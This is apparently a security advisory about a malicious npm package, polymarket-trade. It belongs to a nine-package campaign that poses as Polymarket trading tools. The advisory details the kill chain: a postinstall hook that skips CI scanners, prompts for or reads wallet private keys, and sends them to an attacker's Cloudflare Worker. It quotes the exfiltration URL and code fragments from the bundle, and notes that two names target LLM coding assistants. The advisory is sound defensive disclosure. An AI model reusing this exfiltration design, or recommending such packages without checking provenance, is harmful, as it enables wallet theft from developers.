VYPR

npm · Malicious package advisory

Malware

polymarket-trade

MAL-2026-4215

Malicious code in polymarket-trade (npm)

Details

A coordinated supply-chain attack comprising 9 npm packages published by maintainer `polymarketdev` (GitHub actor `texsellix`, repo `texsellix/polymarket-trading-bot`) within a ~2-minute window on 2026-05-20T23:30Z–23:32Z. All packages masquerade as legitimate Polymarket CLOB trading tools while exfiltrating Ethereum private keys to a Cloudflare Worker C2 at `https://polymarketbot.polymarketdev.workers.dev/v1/wallets/keys`.

**Kill chain:**
- The `postinstall` hook (`scripts/postinstall.mjs`) probes for an interactive TTY. On non-interactive shells (CI/CD scanners), it prints "polybot installed" and exits to evade automated analysis.
- **Interactive path:** displays a masked readline prompt soliciting the wallet private key.
- **Passive path:** reads `.env` files in the current working directory and extracts the `PRIVATE_KEY` environment variable with no user interaction — developers who keep `PRIVATE_KEY` in their environment lose it silently.
- **Local persistence:** creates `~/.polybot/` (mode 0700) containing `device.json` (UUID + creation timestamp) and `wallets.json` (Ethereum address + keccak256 fingerprint + `pushedAt` timestamp).
- **Exfiltration:** POSTs `{ privateKey, label }` as plain JSON over HTTPS to the C2, with header `x-polybot-device: <UUID>` for device fingerprinting.

**Distinctive fingerprint:** All 9 packages ship a byte-identical `dist/index.js` (711 KB, SHA-256 `e01b85c1437085a519217338fe4ee5ed7858c28a10f8c1477b2f1857c3386edb`) — only the `name` field in `package.json` differs across packages. The bundle wraps the real Polymarket CLOB SDK, ethers.js, Zod, pino, and WebSocket to provide working `scan` / `quote` / `trade` / `copy` commands as cover for credential theft. The banner falsely claims private keys "stay encrypted."

**Targeting:** `polymarket-claude-code` and `polymarket-ai-agent` are named to surface in LLM-assisted coding workflows that recommend packages without provenance evaluation.

`polymarket-trade` targets Polymarket traders searching by trading-focused keyword. Payload is identical to the rest of the campaign.

---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (5ebe32576f2e47b534eef1c645c76dd96daa93d79df1240df49d380fbea5f737)
On install, package.json's postinstall hook runs scripts/postinstall.mjs, which detects an interactive TTY and auto-spawns `node dist/index.js login` with inherited stdio. The login flow prompts the installer for a wallet private key (a Polygon EOA controlling real USDC and Polymarket CTF positions) and POSTs the raw key to `https://polymarketbot.polymarketdev.workers.dev/v1/wallets/keys` via `RemoteVault.push` (dist/index.js: `var kC="https://polymarketbot.polymarketdev.workers.dev"` and `Th={async push(t,e,r){return Sh("POST","/v1/wallets/keys",t,{privateKey:e,label:r})}}`). The destination is an author-operated Cloudflare Worker on a `*.workers.dev` subdomain, not any official Polymarket infrastructure. Comments in the postinstall script (`Internals (vault encryption, fingerprints, Worker URL) are intentionally kept out of the user-visible message... that surface is on a need-to-know basis`) indicate the exfiltration endpoint is deliberately hidden from the prompt UI. The TTY gate skips CI but turns every developer-workstation install into an interactive credential-collection trap. Compromise of the submitted key permits the operator to drain the victim's USDC/positions on Polygon/Polymarket.

Compromised versions (1)

  • 0.1.0

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.